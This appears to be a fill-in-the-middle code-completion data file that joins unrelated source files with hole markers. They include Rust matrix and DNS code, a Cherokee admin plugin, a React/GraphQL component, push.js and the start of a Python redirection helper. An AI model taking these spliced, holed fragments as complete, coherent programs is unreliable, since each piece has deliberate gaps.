u.y*u.x*nca + u.z*sa, ca + u.y*u.y*nca, u.y*u.z*nca - u.x*sa, 0.0,
u.z*u.x*nca - u.y*sa, u.z*u.y*nca + u.x*sa, ca + u.z*u.z*nca, 0.0,
0.0, 0.0, 0.0, 1.0
)
}
/// Creates a rotation matrix from the three _Euler angles_.
pub fn new_euler_rotation(yaw: f32, pitch: f32, roll: f32) -> Mat4 {
let (ca, sa) = (pitch.cos(), pitch.sin());
let (cb, sb) = (yaw.cos(), yaw.sin());
let (cc, sc) = (roll.cos(), roll.sin());
Mat4::new(
cb * cc, -cb * sc, sb, 0.0,
sa * sb * cc + ca * sc, -sa * sb * sc + ca * cc, -sa * cb, 0.0,
-ca * sb * cc + sa * sc, ca * sb * sc + sa * cc, ca * cb, 0.0,
0.0, 0.0, 0.0, 1.0)
}
/// Creates a translation matrix which maps points `p` to `p + by`.
pub fn new_translation(by: Vec3f) -> Mat4 {
Mat4::new(1.0, 0.0, 0.0, by.x,
0.0, 1.0, 0.0, by.y,
0.0, 0.0, 1.0, by.z,
0.0, 0.0, 0.0, 1.0)
}
/// Returns the transpose of the matrix (columns swapped with rows).
pub fn transposed(&self) -> Mat4 {
let m = &self.data;
// m is in column-major order, so calling with new in row-order will
// transpose it.
Mat4::new(m[0], m[1], m[2], m[3],
m[4], m[5], m[6], m[7],
m[8], m[9], m[10], m[11],
m[12], m[13], m[14], m[15])
}
pub fn get(&self, row: usize, column: usize) -> Scalar {
self.data[column * 4 + row]
}
pub fn as_scalar_ptr(&self) -> *const Scalar {
self.data.as_ptr()
}
pub fn approx_eq(&self, rhs: &Mat4, tol: Scalar) -> bool {
self.data.iter().zip(rhs.data.iter()).all(|(x, y)| (x - y).abs() <= tol)
}
}
impl fmt::Debug for Mat4 {
fn fmt(&self, formatter: &mut fmt::Formatter) -> fmt::Result {
write!(formatter,
"[{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e}]",
self.get(0, 0), self.get(0, 1), self.get(0, 2), self.get(0, 3),
self.get(1, 0), self.get(1, 1), self.get(1, 2), self.get(1, 3),
self.get(2, 0), self.get(2, 1), self.get(2, 2), self.get(2, 3),
self.get(3, 0), self.get(3, 1), self.get(3, 2), self.get(3, 3))
}
}
impl<'a, 'b> Mul<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn mul(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] * r[0] + l[4] * r[1] + l[8] * r[2] + l[12] * r[3],
l[1] * r[0] + l[5] * r[1] + l[9] * r[2] + l[13] * r[3],
l[2] * r[0] + l[6] * r[1] + l[10] * r[2] + l[14] * r[3],
l[3] * r[0] + l[7] * r[1] + l[11] * r[2] + l[15] * r[3],
l[0] * r[4] + l[4] * r[5] + l[8] * r[6] + l[12] * r[7],
l[1] * r[4] + l[5] * r[5] + l[9] * r[6] + l[13] * r[7],
l[2] * r[4] + l[6] * r[5] + l[10] * r[6] + l[14] * r[7],
l[3] * r[4] + l[7] * r[5] + l[11] * r[6] + l[15] * r[7],
l[0] * r[8] + l[4] * r[9] + l[ 8] * r[10] + l[12] * r[11],
l[1] * r[8] + l[5] * r[9] + l[ 9] * r[10] + l[13] * r[11],
l[2] * r[8] + l[6] * r[9] + l[10] * r[10] + l[14] * r[11],
l[3] * r[8] + l[7] * r[9] + l[11] * r[10] + l[15] * r[11],
l[0] * r[12] + l[4] * r[13] + l[ 8] * r[14] + l[12] * r[15],
l[1] * r[12] + l[5] * r[13] + l[ 9] * r[14] + l[13] * r[15],
l[2] * r[12] + l[6] * r[13] + l[10] * r[14] + l[14] * r[15],
l[3] * r[12] + l[7] * r[13] + l[11] * r[14] + l[15] * r[15]],
}
}
}
impl<'a, 'b> Add<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn add(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] + r[0], l[1] + r[1], l[2] + r[2], l[3] + r[3],
l[4] + r[4], l[5] + r[5], l[6] + r[6], l[7] + r[7],
l[8] + r[8], l[9] + r[9], l[10] + r[10], l[11] + r[11],
l[12] + r[12], l[13] + r[13], l[14] + r[14], l[15] + r[15]],
}
}
}
impl<'a, 'b> Sub<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn sub(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] - r[0], l[1] - r[1], l[2] - r[2], l[3] - r[3],
l[4] - r[4], l[5] - r[5], l[6] - r[6], l[7] - r[7],
l[8] - r[8], l[9] - r[9], l[10] - r[10], l[11] - r[11],
l[12] - r[12], l[13] - r[13], l[14] - r[14], l[15] - r[15]],
}
}
}
impl Mul<Mat4> for Mat4 {
type Output = Mat4;
fn mul(self, rhs: Mat4) -> Mat4 { &self * &rhs }
}
impl Add<Mat4> for Mat4 {
type Output = Mat4;
fn add(self, rhs: Mat4) -> Mat4 { &self + &rhs }
}
impl Sub<Mat4> for Mat4 {
type Output = Mat4;
fn sub(self, rhs: Mat4) -> Mat4 { &self - &rhs }
}<|fim▁hole|>
impl PartialEq for Mat4 {
fn eq(&self, rhs: &Mat4) -> bool {
self.data.iter().zip(rhs.data.iter()).all(|(x, y)| x == y)
}
}
#[cfg(test)]
mod test {
use super::Mat4;
#[test]
fn test_mul() {
let a = Mat4::new(4.0, 8.0, 1.0, 6.0,
9.0, 4.0, 2.0, 1.0,
4.0, 3.0, 9.0, 3.0,
2.0, 4.0, 9.0, 4.0);
let b = Mat4::new(8.0, 6.0, 5.0, 7.0,
1.0, 7.0, 3.0, 2.0,
1.0, 6.0, 7.0, 4.0,
2.0, 5.0, 2.0, 6.0);
let exp_ab = Mat4::new(53.0, 116.0, 63.0, 84.0,
80.0, 99.0, 73.0, 85.0,
50.0, 114.0, 98.0, 88.0,
37.0, 114.0, 93.0, 82.0);
assert_eq!(exp_ab, a * b);
}
}<|fim▁end|>
| |
<|file_name|>wildcard.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
<|fim▁hole|> add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")<|fim▁end|>
|
dialog += submit
self += dialog
|
<|file_name|>ArtistSeriesArtworksFilter.tsx<|end_file_name|><|fim▁begin|>import { ArtistSeriesArtworksFilter_artistSeries } from "v2/__generated__/ArtistSeriesArtworksFilter_artistSeries.graphql"
import { BaseArtworkFilter } from "v2/Components/v2/ArtworkFilter"
import { ArtworkFilterContextProvider } from "v2/Components/v2/ArtworkFilter/ArtworkFilterContext"
import { updateUrl } from "v2/Components/v2/ArtworkFilter/Utils/urlBuilder"
import { Match, RouterState, withRouter } from "found"
import React from "react"
import { RelayRefetchProp, createRefetchContainer, graphql } from "react-relay"
interface ArtistSeriesArtworksFilterProps {
artistSeries: ArtistSeriesArtworksFilter_artistSeries
relay: RelayRefetchProp
match?: Match
}
const ArtistSeriesArtworksFilter: React.FC<ArtistSeriesArtworksFilterProps> = props => {
const { match, relay, artistSeries } = props
const { filtered_artworks } = artistSeries
const hasFilter = filtered_artworks && filtered_artworks.id
// If there was an error fetching the filter,
// we still want to render the rest of the page.
if (!hasFilter) return null
return (
<ArtworkFilterContextProvider
filters={match && match.location.query}
sortOptions={[
{ value: "-decayed_merch", text: "Default" },
{ value: "-has_price,-prices", text: "Price (desc.)" },
{ value: "-has_price,prices", text: "Price (asc.)" },
{ value: "-partner_updated_at", text: "Recently updated" },
{ value: "-published_at", text: "Recently added" },
{ value: "-year", text: "Artwork year (desc.)" },
{ value: "year", text: "Artwork year (asc.)" },
]}
onChange={updateUrl}
>
<BaseArtworkFilter
relay={relay}
viewer={artistSeries}
relayVariables={{
aggregations: ["TOTAL"],
}}
></BaseArtworkFilter>
</ArtworkFilterContextProvider>
)
}
export const ArtistSeriesArtworksFilterRefetchContainer = createRefetchContainer(
withRouter<ArtistSeriesArtworksFilterProps & RouterState>(
ArtistSeriesArtworksFilter
),
{
artistSeries: graphql`
fragment ArtistSeriesArtworksFilter_artistSeries on ArtistSeries
@argumentDefinitions(
acquireable: { type: "Boolean" }
aggregations: { type: "[ArtworkAggregation]" }
atAuction: { type: "Boolean" }
attributionClass: { type: "[String]" }
color: { type: "String" }
forSale: { type: "Boolean" }
height: { type: "String" }
inquireableOnly: { type: "Boolean" }
keyword: { type: "String" }
majorPeriods: { type: "[String]" }
medium: { type: "String", defaultValue: "*" }
offerable: { type: "Boolean" }
page: { type: "Int" }
partnerID: { type: "ID" }
priceRange: { type: "String" }
sizes: { type: "[ArtworkSizes]" }
sort: { type: "String", defaultValue: "-partner_updated_at" }
width: { type: "String" }
) {
filtered_artworks: filterArtworksConnection(
acquireable: $acquireable
aggregations: $aggregations
atAuction: $atAuction
attributionClass: $attributionClass
color: $color
forSale: $forSale
height: $height
inquireableOnly: $inquireableOnly
keyword: $keyword
majorPeriods: $majorPeriods
medium: $medium
offerable: $offerable
page: $page
partnerID: $partnerID
priceRange: $priceRange
sizes: $sizes
first: 20
after: ""
sort: $sort
width: $width
) {
id
...ArtworkFilterArtworkGrid2_filtered_artworks
}
}
`,
},
graphql`
query ArtistSeriesArtworksFilterQuery(
$acquireable: Boolean
$aggregations: [ArtworkAggregation] = [
MEDIUM
TOTAL
GALLERY
INSTITUTION
MAJOR_PERIOD
]
$slug: ID!
$atAuction: Boolean
$attributionClass: [String]
$color: String
$forSale: Boolean
$height: String
$inquireableOnly: Boolean
$keyword: String
$majorPeriods: [String]
$medium: String<|fim▁hole|> $partnerID: ID
$priceRange: String
$sizes: [ArtworkSizes]
$sort: String
$width: String
) {
artistSeries(id: $slug) {
...ArtistSeriesArtworksFilter_artistSeries
@arguments(
acquireable: $acquireable
aggregations: $aggregations
atAuction: $atAuction
attributionClass: $attributionClass
color: $color
forSale: $forSale
height: $height
inquireableOnly: $inquireableOnly
keyword: $keyword
majorPeriods: $majorPeriods
medium: $medium
offerable: $offerable
page: $page
partnerID: $partnerID
priceRange: $priceRange
sizes: $sizes
sort: $sort
width: $width
)
}
}
`
)<|fim▁end|>
|
$offerable: Boolean
$page: Int
|
<|file_name|>rfc3596.rs<|end_file_name|><|fim▁begin|>//! Record data from [RFC 3596].
//!
//! This RFC defines the Aaaa record type.
//!
//! [RFC 3596]: https://tools.ietf.org/html/rfc3596
use std::fmt;
use std::net::Ipv6Addr;
use std::str::FromStr;
use ::bits::{Composable, Composer, ComposeResult, DNameSlice, ParsedRecordData,
Parser, ParseResult, RecordData};
use ::iana::Rtype;
use ::master::{Scanner, ScanResult};
//------------ Aaaa ---------------------------------------------------------
#[derive(Clone, Debug, Eq, Ord, PartialEq, PartialOrd)]
pub struct Aaaa {
addr: Ipv6Addr
}
impl Aaaa {
pub fn new(addr: Ipv6Addr) -> Aaaa {
Aaaa { addr: addr }
}
pub fn addr(&self) -> Ipv6Addr { self.addr }
pub fn set_addr(&mut self, addr: Ipv6Addr) { self.addr = addr }
fn parse_always(parser: &mut Parser) -> ParseResult<Self> {
Ok(Aaaa::new(Ipv6Addr::new(try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()))))
}
pub fn scan<S: Scanner>(scanner: &mut S, _origin: Option<&DNameSlice>)
-> ScanResult<Self> {
scanner.scan_str_phrase(|slice| {
let addr = try!(Ipv6Addr::from_str(slice));
Ok(Aaaa::new(addr))
})
}
}
impl RecordData for Aaaa {
fn rtype(&self) -> Rtype { Rtype::Aaaa }
fn compose<C: AsMut<Composer>>(&self, mut target: C)
-> ComposeResult<()> {
for i in &self.addr.segments() {
try!(i.compose(target.as_mut()));
}
Ok(())
}
}
impl<'a> ParsedRecordData<'a> for Aaaa {
fn parse(rtype: Rtype, parser: &mut Parser) -> ParseResult<Option<Self>> {
if rtype == Rtype::Aaaa { Aaaa::parse_always(parser).map(Some) }
else { Ok(None) }
}<|fim▁hole|> fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
self.addr.fmt(f)
}
}<|fim▁end|>
|
}
impl fmt::Display for Aaaa {
|
<|file_name|>command.rs<|end_file_name|><|fim▁begin|>use irc_lib::client::data::Message;
pub enum Command {
Join {
channel: String,<|fim▁hole|> message: Option<String>,
},
PrivMsg {
target: String,
message: String,
},
Quit {
message: Option<String>,
},
MessageReceived(Message),
}<|fim▁end|>
|
},
Part {
channel: String,
|
<|file_name|>poll.rs<|end_file_name|><|fim▁begin|>#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
use sys::time::TimeSpec;
#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
use sys::signal::SigSet;
use std::os::unix::io::RawFd;
use libc;
use {Errno, Result};
/// This is a wrapper around `libc::pollfd`.
///
/// It's meant to be used as an argument to the [`poll`](fn.poll.html) and
/// [`ppoll`](fn.ppoll.html) functions to specify the events of interest
/// for a specific file descriptor.
///
/// After a call to `poll` or `ppoll`, the events that occured can be
/// retrieved by calling [`revents()`](#method.revents) on the `PollFd`.
#[repr(C)]
#[derive(Clone, Copy)]
pub struct PollFd {
pollfd: libc::pollfd,
}
impl PollFd {
/// Creates a new `PollFd` specifying the events of interest
/// for a given file descriptor.
pub fn new(fd: RawFd, events: EventFlags) -> PollFd {
PollFd {
pollfd: libc::pollfd {
fd: fd,
events: events.bits(),
revents: EventFlags::empty().bits(),
},
}
}
/// Returns the events that occured in the last call to `poll` or `ppoll`.
pub fn revents(&self) -> Option<EventFlags> {
EventFlags::from_bits(self.pollfd.revents)
}
}
libc_bitflags! {
/// These flags define the different events that can be monitored by `poll` and `ppoll`<|fim▁hole|> POLLIN;
/// There is some exceptional condition on the file descriptor.
///
/// Possibilities include:
///
/// * There is out-of-band data on a TCP socket (see
/// [tcp(7)](http://man7.org/linux/man-pages/man7/tcp.7.html)).
/// * A pseudoterminal master in packet mode has seen a state
/// change on the slave (see
/// [ioctl_tty(2)](http://man7.org/linux/man-pages/man2/ioctl_tty.2.html)).
/// * A cgroup.events file has been modified (see
/// [cgroups(7)](http://man7.org/linux/man-pages/man7/cgroups.7.html)).
POLLPRI;
/// Writing is now possible, though a write larger that the
/// available space in a socket or pipe will still block (unless
/// `O_NONBLOCK` is set).
POLLOUT;
/// Equivalent to [`POLLIN`](constant.POLLIN.html)
POLLRDNORM;
/// Equivalent to [`POLLOUT`](constant.POLLOUT.html)
POLLWRNORM;
/// Priority band data can be read (generally unused on Linux).
POLLRDBAND;
/// Priority data may be written.
POLLWRBAND;
/// Error condition (only returned in
/// [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
/// This bit is also set for a file descriptor referring to the
/// write end of a pipe when the read end has been closed.
POLLERR;
/// Hang up (only returned in [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
/// Note that when reading from a channel such as a pipe or a stream
/// socket, this event merely indicates that the peer closed its
/// end of the channel. Subsequent reads from the channel will
/// return 0 (end of file) only after all outstanding data in the
/// channel has been consumed.
POLLHUP;
/// Invalid request: `fd` not open (only returned in
/// [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
POLLNVAL;
}
}
/// `poll` waits for one of a set of file descriptors to become ready to perform I/O.
/// ([`poll(2)`](http://pubs.opengroup.org/onlinepubs/9699919799/functions/poll.html))
///
/// `fds` contains all [`PollFd`](struct.PollFd.html) to poll.
/// The function will return as soon as any event occur for any of these `PollFd`s.
///
/// The `timeout` argument specifies the number of milliseconds that `poll()`
/// should block waiting for a file descriptor to become ready. The call
/// will block until either:
///
/// * a file descriptor becomes ready;
/// * the call is interrupted by a signal handler; or
/// * the timeout expires.
///
/// Note that the timeout interval will be rounded up to the system clock
/// granularity, and kernel scheduling delays mean that the blocking
/// interval may overrun by a small amount. Specifying a negative value
/// in timeout means an infinite timeout. Specifying a timeout of zero
/// causes `poll()` to return immediately, even if no file descriptors are
/// ready.
pub fn poll(fds: &mut [PollFd], timeout: libc::c_int) -> Result<libc::c_int> {
let res = unsafe {
libc::poll(fds.as_mut_ptr() as *mut libc::pollfd,
fds.len() as libc::nfds_t,
timeout)
};
Errno::result(res)
}
/// `ppoll()` allows an application to safely wait until either a file
/// descriptor becomes ready or until a signal is caught.
/// ([`poll(2)`](http://man7.org/linux/man-pages/man2/poll.2.html))
///
/// `ppoll` behaves like `poll`, but let you specify what signals may interrupt it
/// with the `sigmask` argument.
///
#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
pub fn ppoll(fds: &mut [PollFd], timeout: TimeSpec, sigmask: SigSet) -> Result<libc::c_int> {
let res = unsafe {
libc::ppoll(fds.as_mut_ptr() as *mut libc::pollfd,
fds.len() as libc::nfds_t,
timeout.as_ref(),
sigmask.as_ref())
};
Errno::result(res)
}<|fim▁end|>
|
pub struct EventFlags: libc::c_short {
/// There is data to read.
|
<|file_name|>push.js<|end_file_name|><|fim▁begin|>/* ----------------------------------
* PUSH v2.0.0
* Licensed under The MIT License
* inspired by chris's jquery.pjax.js
* http://opensource.org/licenses/MIT
* ---------------------------------- */
!function () {
var noop = function () {};
// Pushstate cacheing
// ==================
var isScrolling;
var maxCacheLength = 20;
var cacheMapping = sessionStorage;
var domCache = {};
var transitionMap = {
'slide-in' : 'slide-out',
'slide-out' : 'slide-in',
'fade' : 'fade'
};
var bars = {
bartab : '.bar-tab',
barnav : '.bar-nav',
barfooter : '.bar-footer',
barheadersecondary : '.bar-header-secondary'
};
var cacheReplace = function (data, updates) {
PUSH.id = data.id;
if (updates) data = getCached(data.id);
cacheMapping[data.id] = JSON.stringify(data);
window.history.replaceState(data.id, data.title, data.url);
domCache[data.id] = document.body.cloneNode(true);
};
var cachePush = function () {
var id = PUSH.id;
var cacheForwardStack = JSON.parse(cacheMapping.cacheForwardStack || '[]');
var cacheBackStack = JSON.parse(cacheMapping.cacheBackStack || '[]');
cacheBackStack.push(id);
while (cacheForwardStack.length) delete cacheMapping[cacheForwardStack.shift()];
while (cacheBackStack.length > maxCacheLength) delete cacheMapping[cacheBackStack.shift()];
window.history.pushState(null, '', cacheMapping[PUSH.id].url);
cacheMapping.cacheForwardStack = JSON.stringify(cacheForwardStack);
cacheMapping.cacheBackStack = JSON.stringify(cacheBackStack);
};
var cachePop = function (id, direction) {
var forward = direction == 'forward';
var cacheForwardStack = JSON.parse(cacheMapping.cacheForwardStack || '[]');
var cacheBackStack = JSON.parse(cacheMapping.cacheBackStack || '[]');
var pushStack = forward ? cacheBackStack : cacheForwardStack;
var popStack = forward ? cacheForwardStack : cacheBackStack;
if (PUSH.id) pushStack.push(PUSH.id);
popStack.pop();
cacheMapping.cacheForwardStack = JSON.stringify(cacheForwardStack);
cacheMapping.cacheBackStack = JSON.stringify(cacheBackStack);
};
var getCached = function (id) {
return JSON.parse(cacheMapping[id] || null) || {};
};
var getTarget = function (e) {
var target = findTarget(e.target);
<|fim▁hole|> || e.metaKey
|| e.ctrlKey
|| isScrolling
|| location.protocol !== target.protocol
|| location.host !== target.host
|| !target.hash && /#/.test(target.href)
|| target.hash && target.href.replace(target.hash, '') === location.href.replace(location.hash, '')
|| target.getAttribute('data-ignore') == 'push'
) return;
return target;
};
// Main event handlers (touchend, popstate)
// ==========================================
var touchend = function (e) {
var target = getTarget(e);
if (!target) return;
e.preventDefault();
PUSH({
url : target.href,
hash : target.hash,
timeout : target.getAttribute('data-timeout'),
transition : target.getAttribute('data-transition')
});
};
var popstate = function (e) {
var key;
var barElement;
var activeObj;
var activeDom;
var direction;
var transition;
var transitionFrom;
var transitionFromObj;
var id = e.state;
if (!id || !cacheMapping[id]) return;
direction = PUSH.id < id ? 'forward' : 'back';
cachePop(id, direction);
activeObj = getCached(id);
activeDom = domCache[id];
if (activeObj.title) document.title = activeObj.title;
if (direction == 'back') {
transitionFrom = JSON.parse(direction == 'back' ? cacheMapping.cacheForwardStack : cacheMapping.cacheBackStack);
transitionFromObj = getCached(transitionFrom[transitionFrom.length - 1]);
} else {
transitionFromObj = activeObj;
}
if (direction == 'back' && !transitionFromObj.id) return PUSH.id = id;
transition = direction == 'back' ? transitionMap[transitionFromObj.transition] : transitionFromObj.transition;
if (!activeDom) {
return PUSH({
id : activeObj.id,
url : activeObj.url,
title : activeObj.title,
timeout : activeObj.timeout,
transition : transition,
ignorePush : true
});
}
if (transitionFromObj.transition) {
activeObj = extendWithDom(activeObj, '.content', activeDom.cloneNode(true));
for (key in bars) {
barElement = document.querySelector(bars[key])
if (activeObj[key]) swapContent(activeObj[key], barElement);
else if (barElement) barElement.parentNode.removeChild(barElement);
}
}
swapContent(
(activeObj.contents || activeDom).cloneNode(true),
document.querySelector('.content'),
transition
);
PUSH.id = id;
document.body.offsetHeight; // force reflow to prevent scroll
};
// Core PUSH functionality
// =======================
var PUSH = function (options) {
var key;
var data = {};
var xhr = PUSH.xhr;
options.container = options.container || options.transition ? document.querySelector('.content') : document.body;
for (key in bars) {
options[key] = options[key] || document.querySelector(bars[key]);
}
if (xhr && xhr.readyState < 4) {
xhr.onreadystatechange = noop;
xhr.abort()
}
xhr = new XMLHttpRequest();
xhr.open('GET', options.url, true);
xhr.setRequestHeader('X-PUSH', 'true');
xhr.onreadystatechange = function () {
if (options._timeout) clearTimeout(options._timeout);
if (xhr.readyState == 4) xhr.status == 200 ? success(xhr, options) : failure(options.url);
};
if (!PUSH.id) {
cacheReplace({
id : +new Date,
url : window.location.href,
title : document.title,
timeout : options.timeout,
transition : null
});
}
if (options.timeout) {
options._timeout = setTimeout(function () { xhr.abort('timeout'); }, options.timeout);
}
xhr.send();
if (xhr.readyState && !options.ignorePush) cachePush();
};
// Main XHR handlers
// =================
var success = function (xhr, options) {
var key;
var barElement;
var data = parseXHR(xhr, options);
if (!data.contents) return locationReplace(options.url);
if (data.title) document.title = data.title;
if (options.transition) {
for (key in bars) {
barElement = document.querySelector(bars[key])
if (data[key]) swapContent(data[key], barElement);
else if (barElement) barElement.parentNode.removeChild(barElement);
}
}
swapContent(data.contents, options.container, options.transition, function () {
cacheReplace({
id : options.id || +new Date,
url : data.url,
title : data.title,
timeout : options.timeout,
transition : options.transition
}, options.id);
triggerStateChange();
});
if (!options.ignorePush && window._gaq) _gaq.push(['_trackPageview']) // google analytics
if (!options.hash) return;
};
var failure = function (url) {
throw new Error('Could not get: ' + url)
};
// PUSH helpers
// ============
var swapContent = function (swap, container, transition, complete) {
var enter;
var containerDirection;
var swapDirection;
if (!transition) {
if (container) container.innerHTML = swap.innerHTML;
else if (swap.classList.contains('content')) document.body.appendChild(swap);
else document.body.insertBefore(swap, document.querySelector('.content'));
} else {
enter = /in$/.test(transition);
if (transition == 'fade') {
container.classList.add('in');
container.classList.add('fade');
swap.classList.add('fade');
}
if (/slide/.test(transition)) {
swap.classList.add('sliding-in', enter ? 'right' : 'left');
swap.classList.add('sliding');
container.classList.add('sliding');
}
container.parentNode.insertBefore(swap, container);
}
if (!transition) complete && complete();
if (transition == 'fade') {
container.offsetWidth; // force reflow
container.classList.remove('in');
container.addEventListener('webkitTransitionEnd', fadeContainerEnd);
function fadeContainerEnd() {
container.removeEventListener('webkitTransitionEnd', fadeContainerEnd);
swap.classList.add('in');
swap.addEventListener('webkitTransitionEnd', fadeSwapEnd);
}
function fadeSwapEnd () {
swap.removeEventListener('webkitTransitionEnd', fadeSwapEnd);
container.parentNode.removeChild(container);
swap.classList.remove('fade');
swap.classList.remove('in');
complete && complete();
}
}
if (/slide/.test(transition)) {
container.offsetWidth; // force reflow
swapDirection = enter ? 'right' : 'left'
containerDirection = enter ? 'left' : 'right'
container.classList.add(containerDirection);
swap.classList.remove(swapDirection);
swap.addEventListener('webkitTransitionEnd', slideEnd);
function slideEnd() {
swap.removeEventListener('webkitTransitionEnd', slideEnd);
swap.classList.remove('sliding', 'sliding-in');
swap.classList.remove(swapDirection);
container.parentNode.removeChild(container);
complete && complete();
}
}
};
var triggerStateChange = function () {
var e = new CustomEvent('push', {
detail: { state: getCached(PUSH.id) },
bubbles: true,
cancelable: true
});
window.dispatchEvent(e);
};
var findTarget = function (target) {
var i, toggles = document.querySelectorAll('a');
for (; target && target !== document; target = target.parentNode) {
for (i = toggles.length; i--;) { if (toggles[i] === target) return target; }
}
};
var locationReplace = function (url) {
window.history.replaceState(null, '', '#');
window.location.replace(url);
};
var parseURL = function (url) {
var a = document.createElement('a'); a.href = url; return a;
};
var extendWithDom = function (obj, fragment, dom) {
var i;
var result = {};
for (i in obj) result[i] = obj[i];
Object.keys(bars).forEach(function (key) {
var el = dom.querySelector(bars[key]);
if (el) el.parentNode.removeChild(el);
result[key] = el;
});
result.contents = dom.querySelector(fragment);
return result;
};
var parseXHR = function (xhr, options) {
var head;
var body;
var data = {};
var responseText = xhr.responseText;
data.url = options.url;
if (!responseText) return data;
if (/<html/i.test(responseText)) {
head = document.createElement('div');
body = document.createElement('div');
head.innerHTML = responseText.match(/<head[^>]*>([\s\S.]*)<\/head>/i)[0]
body.innerHTML = responseText.match(/<body[^>]*>([\s\S.]*)<\/body>/i)[0]
} else {
head = body = document.createElement('div');
head.innerHTML = responseText;
}
data.title = head.querySelector('title');
data.title = data.title && data.title.innerText.trim();
if (options.transition) data = extendWithDom(data, '.content', body);
else data.contents = body;
return data;
};
// Attach PUSH event handlers
// ==========================
window.addEventListener('touchstart', function () { isScrolling = false; });
window.addEventListener('touchmove', function () { isScrolling = true; })
window.addEventListener('touchend', touchend);
window.addEventListener('click', function (e) { if (getTarget(e)) e.preventDefault(); });
window.addEventListener('popstate', popstate);
window.PUSH = PUSH;
}();<|fim▁end|>
|
if (
! target
|| e.which > 1
|
<|file_name|>liveness-swap-uninit.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your<|fim▁hole|>fn main() {
let mut x = 3;
let y;
x <-> y; //~ ERROR use of possibly uninitialized variable: `y`
copy x;
}<|fim▁end|>
|
// option. This file may not be copied, modified, or distributed
// except according to those terms.
|
<|file_name|>redirection.py<|end_file_name|><|fim▁begin|>import string<|fim▁hole|>import uuid
import random
from util import iDict
import exception
# Nothing is validating the Redir section in the xml. I may get nonexistent
# params.
#
__all__ = ['RedirectionManager', 'LocalRedirection', 'RemoteRedirection']
def str2bool(x):
if x is None:
return False
if x.lower() in ('true', 't', '1'):
return True
else:
return False
def strip_xpath(x):
if not x:
return x
if x.startswith('/'):
return ""
else:
return x
def is_identifier(x):
if not x:
return False
else:
if x[0] in string.digits:
return False
else:
return True
def rand_port():
